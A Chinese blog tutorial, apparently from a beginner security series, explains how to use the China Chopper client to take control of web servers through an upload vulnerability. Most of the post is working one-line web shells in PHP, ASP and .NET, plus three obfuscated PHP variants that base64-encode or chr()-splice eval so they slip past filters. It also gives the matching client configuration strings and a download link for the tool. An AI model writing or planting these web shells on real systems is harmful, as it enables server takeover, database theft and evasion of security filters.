zoukankan      html  css  js  c++  java
  • 从零开始学安全(二十八)●中国菜刀各模块使用详解

    链接:https://pan.baidu.com/s/1G7cAh81j1xcNpqeVSjQwqw
    提取码:vvbz
    网盘上的是无后门版的  可以放心使用

    点开界面如下  菜刀是在对方存在上传漏洞时 可以通过一句话木马进行快速获取对方服务器shell

    假定对方存在上传漏洞  就新建 txt文件   判断对方什么语言编程  对txt 写入相应的代码修改后缀 这里省略了jsp

    因为代码较多 想知道的可以去baidu 查jsp 的一句话木马

    PHP:

    <?php @eval($_POST['pass']);?>
    

    ASP:

    <%eval request("pass")%>
    

    .NET:

    <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

    修改完后保存文件上传  

    我们假定对方是php语言

    这是就添加shell  

    地址 填你上传文件的目录 +文件名    pass 就是你一句话目录里写的变量接受值  记住菜刀的请求都是post

    点添加  添加完双击  就可以获取控制

    这里分别可以进行 的管理

     如果是数据库就要配置

    在这里写入

    <T>MYSQL</T> //这里填写数据库类型

    <H>localhost</H> //这里填写数据库主机地址

    <U>root</U> //这里填写数据库用户名

    <P>root</P>//这里填写数据库密码

    <L>utf8</L> //这里填写编码方式  

    连接成功后你就可以控制数据库了

     菜刀也可以对网络进行爬虫

    回车就可以看到当前网站的目录下所有文件  值得注意的是有的网站对一句话木马进行了限制 我可以用加密的方式绕过

    加密类变形

    <?php echo "404 Not Found!</br>"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>

    在菜刀里写http://目标/hack.php 密码:page  

    菜刀配置填:

     <O>com=settoken&content=ZXZhbCgkX1BPU1RbJ3BhZ2UnXSk7</O>

    变量拼接类变形

    <?php 
    $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];if(isset($s22)){eval($s21($s22));}
    ?>

    密码是:0

    菜刀配置填:

    <O>n985de9=QGV2YWwoJF9QT1NUWzBdKTs=</O>

    加密拼接类变形

    <?php $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>

    密码:1

  • 相关阅读:
    [转]java 常用弹出框
    [转]ImageIcon icon 相对路径设置
    [转]『基本ASCII表和c语言运算表查询』
    [转]sqlmap技术手册
    [转]linux下怎么查看ssh的用户登录日志
    [转]Kali-linux安装之后的简单设置
    查看任意程序所连接的ip地址
    JS 闭包
    JS 中的 继承
    JS 原型的 理解
  • 原文地址:https://www.cnblogs.com/feizianquan/p/10554613.html
Copyright © 2011-2022 走看看